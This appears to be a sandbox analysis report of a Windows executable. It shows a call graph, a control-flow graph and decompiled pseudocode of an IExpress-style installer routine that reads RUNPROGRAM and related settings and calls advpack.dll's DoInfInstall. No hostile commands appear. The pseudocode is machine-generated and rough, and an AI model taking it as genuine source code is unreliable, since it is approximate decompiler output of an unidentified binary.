                                                                                                                                                                                                                                            callgraph 0 Function_00322630 53 Function_003244B9 0->53 94 Function_00326CE0 0->94 1 Function_00324C37 2 Function_00323A3F 13 Function_00326517 2->13 2->53 80 Function_00326285 2->80 84 Function_0032468F 2->84 3 Function_00326C3F 4 Function_00327120 5 Function_00326A20 6 Function_00323B26 6->13 71 Function_00326298 6->71 92 Function_00324FE0 6->92 7 Function_00324224 7->53 75 Function_00321680 7->75 8 Function_00326E2A 85 Function_00326CF0 8->85 9 Function_0032202A 15 Function_0032171E 9->15 9->53 81 Function_0032658A 9->81 9->94 10 Function_00323210 10->7 31 Function_0032597D 10->31 10->53 10->81 111 Function_003243D0 10->111 116 Function_003258C8 10->116 11 Function_00327010 12 Function_00325C17 13->53 14 Function_0032411B 62 Function_00321EA7 14->62 16 Function_0032621E 16->31 16->53 16->80 16->94 17 Function_0032681F 89 Function_003266F9 17->89 17->94 18 Function_00322F1D 18->2 18->6 18->16 38 Function_00325164 18->38 39 Function_00324169 18->39 40 Function_0032256D 18->40 18->53 55 Function_00323BA2 18->55 58 Function_003255A0 18->58 18->80 18->81 18->94 99 Function_003251E5 18->99 19 Function_00324702 50 Function_003216B3 19->50 19->75 20 Function_00326C03 49 Function_0032724D 20->49 21 Function_00327000 22 Function_00324200 23 Function_00323100 23->111 24 Function_00327208 25 Function_0032490C 26 Function_00322773 26->75 78 Function_00321781 26->78 26->81 26->94 27 Function_00327270 28 Function_00326C70 29 Function_0032487A 29->25 30 Function_0032667F 48 Function_00326648 30->48 31->53 31->80 82 Function_0032268B 31->82 31->94 32 Function_00326A60 32->3 32->24 34 Function_00327060 32->34 46 Function_00327155 32->46 32->49 88 Function_00322BFB 32->88 33 Function_00324B60 34->4 34->11 35 Function_00326760 36 Function_00325467 36->31 60 Function_003253A1 36->60 36->75 36->78 36->80 36->81 36->94 36->116 37 Function_00322267 37->15 37->81 37->94 38->53 38->71 38->84 39->53 39->84 95 Function_003224E0 40->95 41 Function_0032476D 41->13 65 Function_003266AE 41->65 42 Function_00326952 43 Function_00324A50 44 Function_00323450 44->111 45 Function_00326F54 45->24 45->49 47 Function_00326F40 50->78 51 Function_003269B0 51->21 51->28 54 Function_00326FBE 51->54 107 Function_003271EF 51->107 52 Function_003252B6 68 Function_00322390 52->68 52->78 52->94 98 Function_00321FE1 52->98 103 Function_003265E8 52->103 53->15 53->17 53->75 53->94 119 Function_003267C9 53->119 54->45 55->9 55->37 55->53 70 Function_00326495 55->70 55->78 55->80 55->84 55->94 101 Function_00321AE8 55->101 106 Function_00323FEF 55->106 56 Function_003272A2 57 Function_003218A3 57->94 105 Function_003217EE 57->105 58->0 58->13 58->31 58->36 58->42 58->53 58->78 58->80 58->81 58->84 58->94 59 Function_00324CA0 60->15 60->75 60->81 60->94 61 Function_00326FA1 62->40 63 Function_00326FA5 63->49 64 Function_00322CAA 64->13 64->53 64->57 64->68 73 Function_00325C9E 64->73 64->84 64->94 104 Function_003236EE 64->104 66 Function_00322AAC 66->75 66->94 66->103 118 Function_003217C8 66->118 67 Function_00326793 68->50 68->68 68->75 68->81 68->94 69 Function_00321F90 69->53 69->62 69->94 70->78 70->81 70->94 71->15 71->94 72 Function_00324E99 72->75 73->8 73->12 73->30 73->53 73->75 73->81 93 Function_003231E0 73->93 73->94 117 Function_003266C8 73->117 74 Function_00324980 74->29 74->53 75->78 76 Function_00323680 77 Function_00326380 79 Function_00321A84 79->30 81->50 82->15 82->53 82->94 83 Function_00322A89 86 Function_003234F0 86->53 86->76 86->111 87 Function_00326EF0 88->18 88->52 88->64 88->69 90 Function_003270FE 91 Function_00324EFD 91->33 91->74 91->94 92->53 92->84 92->91 94->85 95->81 95->94 96 Function_003219E0 96->94 96->111 97 Function_003247E0 97->53 97->75 99->53 99->80 99->84 100 Function_003270EB 101->15 101->50 101->53 101->66 101->75 101->78 101->79 101->81 101->94 101->117 102 Function_003228E8 102->26 102->83 104->17 104->53 104->83 104->94 104->102 104->119 105->94 106->14 106->53 106->80 106->94 108 Function_00326BEF 109 Function_00324AD0 109->76 110 Function_00324CD0 110->1 110->19 110->33 110->41 110->72 110->74 110->94 110->97 111->94 112 Function_00324CC0 113 Function_00324BC0 114 Function_003230C0 115 Function_003263C0 115->78 115->81 115->94 116->53 116->75 116->80 116->81 117->48 119->67

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 36 323ba2-323bd9 37 323bdb-323bee call 32468f 36->37 38 323bfd-323bff 36->38 45 323d13-323d30 call 3244b9 37->45 46 323bf4-323bf7 37->46 40 323c03-323c28 memset 38->40 41 323d35-323d48 call 321781 40->41 42 323c2e-323c40 call 32468f 40->42 50 323d4d-323d52 41->50 42->45 53 323c46-323c49 42->53 58 323f4d 45->58 46->38 46->45 51 323d54-323d6c call 32468f 50->51 52 323d9e-323db6 call 321ae8 50->52 51->45 65 323d6e-323d75 51->65 52->58 69 323dbc-323dc2 52->69 53->45 56 323c4f-323c56 53->56 61 323c60-323c65 56->61 62 323c58-323c5e 56->62 59 323f4f-323f63 call 326ce0 58->59 67 323c67-323c6d 61->67 68 323c75-323c7c 61->68 66 323c6e-323c73 62->66 71 323fda-323fe1 65->71 72 323d7b-323d98 CompareStringA 65->72 73 323c87-323c89 66->73 67->66 68->73 76 323c7e-323c82 68->76 74 323de6-323de8 69->74 75 323dc4-323dce 69->75 77 323fe3 call 322267 71->77 78 323fe8-323fea 71->78 72->52 72->71 73->50 80 323c8f-323c98 73->80 81 323f0b-323f15 call 323fef 74->81 82 323dee-323df5 74->82 75->74 79 323dd0-323dd7 75->79 76->73 77->78 78->59 79->74 87 323dd9-323ddb 79->87 88 323cf1-323cf3 80->88 89 323c9a-323c9c 80->89 92 323f1a-323f1c 81->92 83 323fab-323fd2 call 3244b9 LocalFree 82->83 84 323dfb-323dfd 82->84 83->58 84->81 90 323e03-323e0a 84->90 87->82 93 323ddd-323de1 call 32202a 87->93 88->52 91 323cf9-323d11 call 32468f 88->91 95 323ca5-323ca7 89->95 96 323c9e-323ca3 89->96 90->81 98 323e10-323e19 call 326495 90->98 91->45 91->50 100 323f46-323f47 LocalFree 92->100 101 323f1e-323f2d LocalFree 92->101 93->74 95->58 97 323cad 95->97 104 323cb2-323cc5 call 32468f 96->104 97->104 113 323f92-323fa9 call 3244b9 98->113 114 323e1f-323e36 GetProcAddress 98->114 100->58 108 323f33-323f3b 101->108 109 323fd7-323fd9 101->109 104->45 112 323cc7-323ce8 CompareStringA 104->112 108->40 109->71 112->88 115 323cea-323ced 112->115 126 323f7c-323f90 LocalFree call 326285 113->126 116 323f64-323f76 call 3244b9 FreeLibrary 114->116 117 323e3c-323e80 114->117 115->88 116->126 120 323e82-323e87 117->120 121 323e8b-323e94 117->121 120->121 124 323e96-323e9b 121->124 125 323e9f-323ea2 121->125 124->125 128 323ea4-323ea9 125->128 129 323ead-323eb6 125->129 126->58 128->129 131 323ec1-323ec3 129->131 132 323eb8-323ebd 129->132 133 323ec5-323eca 131->133 134 323ece-323eec 131->134 132->131 133->134 137 323ef5-323efd 134->137 138 323eee-323ef3 134->138 139 323f40 FreeLibrary 137->139 140 323eff-323f09 FreeLibrary 137->140 138->137 139->100 140->101
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00323BA2() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				short _v300;
                                                                                                                                                                                                                                            				intOrPtr _v304;
                                                                                                                                                                                                                                            				void _v348;
                                                                                                                                                                                                                                            				char _v352;
                                                                                                                                                                                                                                            				intOrPtr _v356;
                                                                                                                                                                                                                                            				signed int _v360;
                                                                                                                                                                                                                                            				short _v364;
                                                                                                                                                                                                                                            				char* _v368;
                                                                                                                                                                                                                                            				intOrPtr _v372;
                                                                                                                                                                                                                                            				void* _v376;
                                                                                                                                                                                                                                            				intOrPtr _v380;
                                                                                                                                                                                                                                            				char _v384;
                                                                                                                                                                                                                                            				signed int _v388;
                                                                                                                                                                                                                                            				intOrPtr _v392;
                                                                                                                                                                                                                                            				signed int _v396;
                                                                                                                                                                                                                                            				signed int _v400;
                                                                                                                                                                                                                                            				signed int _v404;
                                                                                                                                                                                                                                            				void* _v408;
                                                                                                                                                                                                                                            				void* _v424;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                                                                                            				short _t96;
                                                                                                                                                                                                                                            				signed int _t97;
                                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                                                                                            				signed int _t108;
                                                                                                                                                                                                                                            				int _t112;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				signed char _t118;
                                                                                                                                                                                                                                            				void* _t125;
                                                                                                                                                                                                                                            				signed int _t127;
                                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                            				void* _t130;
                                                                                                                                                                                                                                            				short _t137;
                                                                                                                                                                                                                                            				char* _t140;
                                                                                                                                                                                                                                            				signed char _t144;
                                                                                                                                                                                                                                            				signed char _t145;
                                                                                                                                                                                                                                            				signed int _t149;
                                                                                                                                                                                                                                            				void* _t150;
                                                                                                                                                                                                                                            				void* _t151;
                                                                                                                                                                                                                                            				signed int _t153;
                                                                                                                                                                                                                                            				void* _t155;
                                                                                                                                                                                                                                            				void* _t156;
                                                                                                                                                                                                                                            				signed int _t157;
                                                                                                                                                                                                                                            				signed int _t162;
                                                                                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                            				_t69 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                            				_t153 = 0;
                                                                                                                                                                                                                                            				 *0x329124 =  *0x329124 & 0;
                                                                                                                                                                                                                                            				_t149 = 0;
                                                                                                                                                                                                                                            				_v388 = 0;
                                                                                                                                                                                                                                            				_v384 = 0;
                                                                                                                                                                                                                                            				_t165 =  *0x328a28 - _t153; // 0x0
                                                                                                                                                                                                                                            				if(_t165 != 0) {
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t127 = 0;
                                                                                                                                                                                                                                            					_v392 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                            						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                            						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                            						_v348 = 0x44;
                                                                                                                                                                                                                                            						if( *0x328c42 != 0) {
                                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t146 =  &_v396;
                                                                                                                                                                                                                                            						_t115 = E0032468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                            						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							_t146 = 0x4b1;
                                                                                                                                                                                                                                            							E003244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							 *0x329124 = 0x80070714;
                                                                                                                                                                                                                                            							goto L62;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(_v396 != 1) {
                                                                                                                                                                                                                                            								__eflags = _v396 - 2;
                                                                                                                                                                                                                                            								if(_v396 != 2) {
                                                                                                                                                                                                                                            									_t137 = 3;
                                                                                                                                                                                                                                            									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                            									if(_v396 == _t137) {
                                                                                                                                                                                                                                            										_v304 = 1;
                                                                                                                                                                                                                                            										_v300 = _t137;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(6);
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								_pop(0);
                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								L11:
                                                                                                                                                                                                                                            								_v300 = 0;
                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                            								if(_t127 != 0) {
                                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                                            									_t155 = 1;
                                                                                                                                                                                                                                            									__eflags = _t127 - 1;
                                                                                                                                                                                                                                            									if(_t127 != 1) {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t132 =  &_v280;
                                                                                                                                                                                                                                            										_t76 = E00321AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                            										__eflags = _t76;
                                                                                                                                                                                                                                            										if(_t76 == 0) {
                                                                                                                                                                                                                                            											L62:
                                                                                                                                                                                                                                            											_t77 = 0;
                                                                                                                                                                                                                                            											L63:
                                                                                                                                                                                                                                            											_pop(_t150);
                                                                                                                                                                                                                                            											_pop(_t156);
                                                                                                                                                                                                                                            											_pop(_t128);
                                                                                                                                                                                                                                            											return E00326CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t157 = _v404;
                                                                                                                                                                                                                                            										__eflags = _t149;
                                                                                                                                                                                                                                            										if(_t149 != 0) {
                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												L57:
                                                                                                                                                                                                                                            												_t151 = _v408;
                                                                                                                                                                                                                                            												_t146 =  &_v352;
                                                                                                                                                                                                                                            												_t130 = _t151; // executed
                                                                                                                                                                                                                                            												_t79 = E00323FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                            												__eflags = _t79;
                                                                                                                                                                                                                                            												if(_t79 == 0) {
                                                                                                                                                                                                                                            													L61:
                                                                                                                                                                                                                                            													LocalFree(_t151);
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                            												LocalFree(_t151);
                                                                                                                                                                                                                                            												_t127 = _t127 + 1;
                                                                                                                                                                                                                                            												_v396 = _t127;
                                                                                                                                                                                                                                            												__eflags = _t127 - 2;
                                                                                                                                                                                                                                            												if(_t127 >= 2) {
                                                                                                                                                                                                                                            													_t155 = 1;
                                                                                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                                                                                            													L69:
                                                                                                                                                                                                                                            													__eflags =  *0x328580;
                                                                                                                                                                                                                                            													if( *0x328580 != 0) {
                                                                                                                                                                                                                                            														E00322267();
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													_t77 = _t155;
                                                                                                                                                                                                                                            													goto L63;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t153 = _v392;
                                                                                                                                                                                                                                            												_t149 = _v388;
                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											L38:
                                                                                                                                                                                                                                            											__eflags =  *0x328180;
                                                                                                                                                                                                                                            											if( *0x328180 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c7;
                                                                                                                                                                                                                                            												E003244B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            												LocalFree(_v424);
                                                                                                                                                                                                                                            												 *0x329124 = 0x8007042b;
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x329a34 & 0x00000004;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t129 = E00326495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                            											__eflags = _t129;
                                                                                                                                                                                                                                            											if(_t129 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c8;
                                                                                                                                                                                                                                            												E003244B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                            												L65:
                                                                                                                                                                                                                                            												LocalFree(_v408);
                                                                                                                                                                                                                                            												 *0x329124 = E00326285();
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                            											_v404 = _t146;
                                                                                                                                                                                                                                            											__eflags = _t146;
                                                                                                                                                                                                                                            											if(_t146 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c9;
                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                            												E003244B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                            												FreeLibrary(_t129);
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x328a30;
                                                                                                                                                                                                                                            											_t151 = _v408;
                                                                                                                                                                                                                                            											_v384 = 0;
                                                                                                                                                                                                                                            											_v368 =  &_v280;
                                                                                                                                                                                                                                            											_t96 =  *0x329a40; // 0x3
                                                                                                                                                                                                                                            											_v364 = _t96;
                                                                                                                                                                                                                                            											_t97 =  *0x328a38 & 0x0000ffff;
                                                                                                                                                                                                                                            											_v380 = 0x329154;
                                                                                                                                                                                                                                            											_v376 = _t151;
                                                                                                                                                                                                                                            											_v372 = 0x3291e4;
                                                                                                                                                                                                                                            											_v360 = _t97;
                                                                                                                                                                                                                                            											if( *0x328a30 != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t144 =  *0x329a34; // 0x1
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t145 =  *0x328d48; // 0x0
                                                                                                                                                                                                                                            											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                            											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t145;
                                                                                                                                                                                                                                            											if(_t145 < 0) {
                                                                                                                                                                                                                                            												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                            												__eflags = _t104;
                                                                                                                                                                                                                                            												_v360 = _t104;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t98 =  *0x329a38; // 0x0
                                                                                                                                                                                                                                            											_v356 = _t98;
                                                                                                                                                                                                                                            											_t130 = _t146;
                                                                                                                                                                                                                                            											 *0x32a288( &_v384);
                                                                                                                                                                                                                                            											_t101 = _v404();
                                                                                                                                                                                                                                            											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                            											if(_t164 != _t164) {
                                                                                                                                                                                                                                            												_t130 = 4;
                                                                                                                                                                                                                                            												asm("int 0x29");
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											 *0x329124 = _t101;
                                                                                                                                                                                                                                            											_push(_t129);
                                                                                                                                                                                                                                            											__eflags = _t101;
                                                                                                                                                                                                                                            											if(_t101 < 0) {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												_t127 = _v400;
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0x329a40 - 1; // 0x3
                                                                                                                                                                                                                                            										if(__eflags == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0x328a20;
                                                                                                                                                                                                                                            										if( *0x328a20 == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t157;
                                                                                                                                                                                                                                            										if(_t157 != 0) {
                                                                                                                                                                                                                                            											goto L38;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            										E0032202A(_t146); // executed
                                                                                                                                                                                                                                            										goto L37;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v280;
                                                                                                                                                                                                                                            									_t108 = E0032468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                            									__eflags = _t108;
                                                                                                                                                                                                                                            									if(_t108 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0x328c42;
                                                                                                                                                                                                                                            									if( *0x328c42 != 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                            									__eflags = _t112 == 0;
                                                                                                                                                                                                                                            									if(_t112 == 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L31;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t118 =  *0x328a38; // 0x0
                                                                                                                                                                                                                                            								if(_t118 == 0) {
                                                                                                                                                                                                                                            									L23:
                                                                                                                                                                                                                                            									if(_t153 != 0) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E0032468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                            										goto L27;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L25;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                            									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            										goto L62;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "USRQCMD";
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E0032468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                            										_t153 = 1;
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L26:
                                                                                                                                                                                                                                            						_push(_t130);
                                                                                                                                                                                                                                            						_t146 = 0x104;
                                                                                                                                                                                                                                            						E00321781( &_v276, 0x104, _t130, 0x328c42);
                                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t130 = "REBOOT";
                                                                                                                                                                                                                                            				_t125 = E0032468F(_t130, 0x329a2c, 4);
                                                                                                                                                                                                                                            				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





























































                                                                                                                                                                                                                                            0x00323baa
                                                                                                                                                                                                                                            0x00323bb0
                                                                                                                                                                                                                                            0x00323bb7
                                                                                                                                                                                                                                            0x00323bc0
                                                                                                                                                                                                                                            0x00323bc2
                                                                                                                                                                                                                                            0x00323bc9
                                                                                                                                                                                                                                            0x00323bcb
                                                                                                                                                                                                                                            0x00323bcf
                                                                                                                                                                                                                                            0x00323bd3
                                                                                                                                                                                                                                            0x00323bd9
                                                                                                                                                                                                                                            0x00323bfd
                                                                                                                                                                                                                                            0x00323bfd
                                                                                                                                                                                                                                            0x00323bff
                                                                                                                                                                                                                                            0x00323c03
                                                                                                                                                                                                                                            0x00323c03
                                                                                                                                                                                                                                            0x00323c11
                                                                                                                                                                                                                                            0x00323c16
                                                                                                                                                                                                                                            0x00323c19
                                                                                                                                                                                                                                            0x00323c28
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323c30
                                                                                                                                                                                                                                            0x00323c39
                                                                                                                                                                                                                                            0x00323c40
                                                                                                                                                                                                                                            0x00323d13
                                                                                                                                                                                                                                            0x00323d15
                                                                                                                                                                                                                                            0x00323d21
                                                                                                                                                                                                                                            0x00323d26
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323c4f
                                                                                                                                                                                                                                            0x00323c56
                                                                                                                                                                                                                                            0x00323c60
                                                                                                                                                                                                                                            0x00323c65
                                                                                                                                                                                                                                            0x00323c77
                                                                                                                                                                                                                                            0x00323c78
                                                                                                                                                                                                                                            0x00323c7c
                                                                                                                                                                                                                                            0x00323c7e
                                                                                                                                                                                                                                            0x00323c82
                                                                                                                                                                                                                                            0x00323c82
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323c7c
                                                                                                                                                                                                                                            0x00323c67
                                                                                                                                                                                                                                            0x00323c69
                                                                                                                                                                                                                                            0x00323c6d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323c58
                                                                                                                                                                                                                                            0x00323c58
                                                                                                                                                                                                                                            0x00323c6e
                                                                                                                                                                                                                                            0x00323c6e
                                                                                                                                                                                                                                            0x00323c87
                                                                                                                                                                                                                                            0x00323c89
                                                                                                                                                                                                                                            0x00323d4d
                                                                                                                                                                                                                                            0x00323d4f
                                                                                                                                                                                                                                            0x00323d50
                                                                                                                                                                                                                                            0x00323d52
                                                                                                                                                                                                                                            0x00323d9e
                                                                                                                                                                                                                                            0x00323da8
                                                                                                                                                                                                                                            0x00323daf
                                                                                                                                                                                                                                            0x00323db4
                                                                                                                                                                                                                                            0x00323db6
                                                                                                                                                                                                                                            0x00323f4d
                                                                                                                                                                                                                                            0x00323f4d
                                                                                                                                                                                                                                            0x00323f4f
                                                                                                                                                                                                                                            0x00323f56
                                                                                                                                                                                                                                            0x00323f57
                                                                                                                                                                                                                                            0x00323f58
                                                                                                                                                                                                                                            0x00323f63
                                                                                                                                                                                                                                            0x00323f63
                                                                                                                                                                                                                                            0x00323dbc
                                                                                                                                                                                                                                            0x00323dc0
                                                                                                                                                                                                                                            0x00323dc2
                                                                                                                                                                                                                                            0x00323de6
                                                                                                                                                                                                                                            0x00323de6
                                                                                                                                                                                                                                            0x00323de8
                                                                                                                                                                                                                                            0x00323f0b
                                                                                                                                                                                                                                            0x00323f0b
                                                                                                                                                                                                                                            0x00323f0f
                                                                                                                                                                                                                                            0x00323f13
                                                                                                                                                                                                                                            0x00323f15
                                                                                                                                                                                                                                            0x00323f1a
                                                                                                                                                                                                                                            0x00323f1c
                                                                                                                                                                                                                                            0x00323f46
                                                                                                                                                                                                                                            0x00323f47
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323f47
                                                                                                                                                                                                                                            0x00323f1e
                                                                                                                                                                                                                                            0x00323f1f
                                                                                                                                                                                                                                            0x00323f25
                                                                                                                                                                                                                                            0x00323f26
                                                                                                                                                                                                                                            0x00323f2a
                                                                                                                                                                                                                                            0x00323f2d
                                                                                                                                                                                                                                            0x00323fd9
                                                                                                                                                                                                                                            0x00323fd9
                                                                                                                                                                                                                                            0x00323fda
